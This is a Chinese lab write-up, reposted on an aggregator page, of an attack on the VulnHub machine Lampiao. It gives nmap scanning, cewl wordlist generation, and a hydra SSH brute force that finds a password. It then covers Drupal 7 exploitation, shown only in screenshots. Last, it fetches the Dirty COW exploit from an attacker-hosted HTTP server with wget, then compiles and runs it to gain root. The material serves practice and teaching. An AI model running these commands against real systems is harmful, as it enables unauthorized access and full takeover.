IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> [VulnHub靶机]Lampiao_脏牛提权 -> 正文阅读

[系统运维][VulnHub靶机]Lampiao_脏牛提权

环境介绍

攻击机:kali(192.168.56.104)
受害机:lampiao(192.168.56.107)

实验步骤

1. 扫描端口

nmap -sS -Pn -A -p- -n 192.168.56.107

开放了22、80、1898端口
在这里插入图片描述
在这里插入图片描述

2. 信息收集

80端口没什么东西,我们访问1898端口,还是先扫描一下1898端口下的目录:

在这里插入图片描述
在这里插入图片描述
这些文件等会再看,1898端口:

在这里插入图片描述

经过测试并不能注册用户,需要通过邮箱验证码才能设置密码,所以行不通.

查看博客的详情页面:
下图是第一篇:

在这里插入图片描述
第二篇:
在这里插入图片描述

中间少了一个?q=node/2

在这里插入图片描述

发现了一张图片和一段音频:
在这里插入图片描述
扫描图片没什么有用的信息

音频的内容是:user tigao

3. ssh爆破

这里要用到一个kali下的工具:cewl
添加目标的一些基本信息,用于生成密码字典

cewl http://192.168.56.107:1898/?q=node/1 -w dict.txt

指定用户名tigao,进行hydra爆破:

hydra -l tiago -P dict.txt -vV -t4 192.168.56.107 ssh

在这里插入图片描述

密码:Virgulino

ssh连接:

在这里插入图片描述

4. drupal 7 漏洞getshell

在这里插入图片描述

百度可以搜到cve编号
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

5. 脏牛提权

第二天的时候靶机无法启动了,搞了搞

靶机:192.168.137.134
kali:192.168.137.128

Dirty COW,CVE-2016-5195,攻击者可利用该漏洞本地以低权限提升到root权限。Dirty COW 是一个特权升级漏洞,可以在每个Linux发行版中找到。这个漏洞的特别之处在于,防病毒和安全软件无法检测,一旦被利用,根本无从知晓。

漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权
如果内核版本低于列表里的版本,表示还存在脏牛漏洞
Centos7 /RHEL7    3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10         4.8.0-26.28
Ubuntu 16.04         4.4.0-45.66
Ubuntu 14.04         3.13.0-100.147
Debian 8                3.16.36-1+deb8u2
Debian 7                3.2.82-1

在这里插入图片描述

查看文件具体所在路径:

locate linux/local/40847.cpp

在这里插入图片描述

开启http服务,通过wget下载我们kali下的40847.cpp

python -m SimpleHTTPServer 8000
wget http://192.168.137.128:8000/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
ls -al
./40847

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
最终得到

root的密码为dirtyCowFun

拿到root权限
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-03-17 22:37:43  更:2022-03-17 22:37:54 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 1:19:36-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码